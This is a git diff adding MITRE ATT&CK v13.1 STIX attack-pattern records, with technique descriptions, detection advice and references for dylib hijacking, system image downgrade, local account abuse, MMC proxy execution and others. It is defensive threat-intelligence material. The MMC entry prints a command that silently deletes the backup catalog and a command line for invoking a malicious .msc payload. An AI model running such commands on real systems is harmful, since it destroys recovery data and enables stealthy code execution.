+ "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "File: File Access", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_network_requirements": false, + "type": "attack-pattern", + "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "created": "2020-03-15T15:37:47.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1048/003", + "external_id": "T1048.003" + }, + { + "source_name": "copy_cmd_cisco", + "description": "Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490.json new file mode 100644 index 0000000000000000000000000000000000000000..d708c603851abf059057caec264c901fe0699ca4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490.json @@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--64a4f54d-5040-4c19-be80-a3efda71a021", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:39.601Z", + "name": "Dylib Hijacking", + "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "File: File Modification", + "File: File Creation", + "Module: Module Load" + ], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", + "created": "2020-03-16T15:23:30.896Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/004", + "external_id": "T1574.004" + }, + { + "source_name": "MalwareUnicorn macOS Dylib Injection MachO", + "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.", + "url": "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5" + }, + { + "source_name": "Apple Developer Doco Archive Run-Path", + "description": "Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html" + }, + { + "source_name": "Wardle Dylib Hijacking OSX 2015", + "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.", + "url": "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf" + }, + { + "source_name": "Writing Bad Malware for OSX", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + }, + { + "source_name": "Wardle Dylib Hijack Vulnerable Apps", + "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.", + "url": "https://objective-see.com/blog/blog_0x46.html" + }, + { + "source_name": "wardle artofmalware volume1", + "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", + "url": "https://taomm.org/vol1/pdfs.html" + }, + { + "source_name": "Github EmpireProject HijackScanner", + "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.", + "url": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py" + }, + { + "source_name": "Github EmpireProject CreateHijacker Dylib", + "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.", + "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d.json new file mode 100644 index 0000000000000000000000000000000000000000..c9ad9791c30cc8b1d744b2f151afcc8d4781e7d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--26eb2129-8357-4f2c-a2b2-0b46c62498bb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "type": "attack-pattern", + "created": "2020-10-19T19:53:10.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1601.002", + "url": "https://attack.mitre.org/techniques/T1601/002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + } + ], + "modified": "2020-10-22T17:49:02.660Z", + "name": "Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "Administrator" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2.json new file mode 100644 index 0000000000000000000000000000000000000000..d34a01ba1e0dd3667ecec218f86026f1027a9437 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--41245398-f6a9-4d06-b578-85b464206edd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T17:17:49.889Z", + "name": "Local Accounts", + "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "User Account: User Account Authentication", + "Logon Session: Logon Session Creation" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "created": "2020-03-13T20:26:46.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078/003", + "external_id": "T1078.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b.json new file mode 100644 index 0000000000000000000000000000000000000000..dfdec377cbdf31fb255bf85099b6d4b320b8b443 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--de584933-c7f8-4c2d-bfdf-b6dbdef33dfc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "John Lambert, Microsoft Threat Intelligence Center" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1211", + "url": "https://attack.mitre.org/techniques/T1211" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.", + "modified": "2022-04-28T16:10:16.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploitation for Defense Evasion", + "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "System access controls" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b.json new file mode 100644 index 0000000000000000000000000000000000000000..4dc060abe2e7aa0bad00482bd84791d7d8d3e36b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--63e21c37-df8f-476d-9a10-8c0abf8b8808", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Casey Smith", + "Matthew Demaske, Adaptforward" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "created": "2017-05-31T21:31:39.262Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1127", + "url": "https://attack.mitre.org/techniques/T1127" + }, + { + "source_name": "Exploit Monday WinDbg", + "url": "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017." + }, + { + "source_name": "LOLBAS Tracker", + "url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019." + }, + { + "source_name": "engima0x3 RCSI Bypass", + "url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017." + }, + { + "source_name": "engima0x3 DNX Bypass", + "url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", + "modified": "2022-05-05T05:00:37.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Trusted Developer Utilities Proxy Execution", + "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc.json new file mode 100644 index 0000000000000000000000000000000000000000..0f88a6973ee2573ab4da97a4075efd4f55ca12c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--f8e3f4bf-9bc6-49fa-ae1b-ceb4cd97ed26", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T20:45:22.531Z", + "name": "System Shutdown/Reboot", + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_contributors": [ + "Austin Clark, @c2defense", + "Hubert Mank" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the reload command.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Sensor Health: Host Status", + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "created": "2019-10-04T20:42:28.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1529", + "external_id": "T1529" + }, + { + "source_name": "Talos Nyetya June 2017", + "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + }, + { + "source_name": "alert_TA18_106A", + "description": "CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Microsoft Shutdown Oct 2017", + "description": "Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407.json new file mode 100644 index 0000000000000000000000000000000000000000..52e692a89c795fcd4948359250daa812e1682c57 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407.json @@ -0,0 +1,97 @@ +{ + "type": "bundle", + "id": "bundle--825cc40c-610b-4703-bb38-e6ded61c1e12", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Wes Hurd" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "created": "2021-09-28T01:36:41.638Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1218.014", + "url": "https://attack.mitre.org/techniques/T1218/014" + }, + { + "source_name": "abusing_com_reg", + "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021." + }, + { + "source_name": "mmc_vulns", + "url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/", + "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021." + }, + { + "source_name": "win_msc_files_overview", + "url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/", + "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021." + }, + { + "source_name": "win_mmc", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc", + "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021." + }, + { + "source_name": "win_wbadmin_delete_catalog", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog", + "description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021." + }, + { + "source_name": "win_clsid_key", + "url": "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm", + "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021." + }, + { + "source_name": "what_is_mmc", + "url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console", + "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021." + }, + { + "source_name": "phobos_virustotal", + "url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection", + "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the \u201cLink to Web Address\u201d snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)", + "modified": "2022-05-20T17:41:16.112Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "MMC", + "x_mitre_detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "Command: Command Execution", + "File: File Creation", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Application control", + "Digital Certificate Validation" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1.json new file mode 100644 index 0000000000000000000000000000000000000000..6aaa499ff6bf2069bddf43639915046a45a5fba6 --- /dev/null +++ 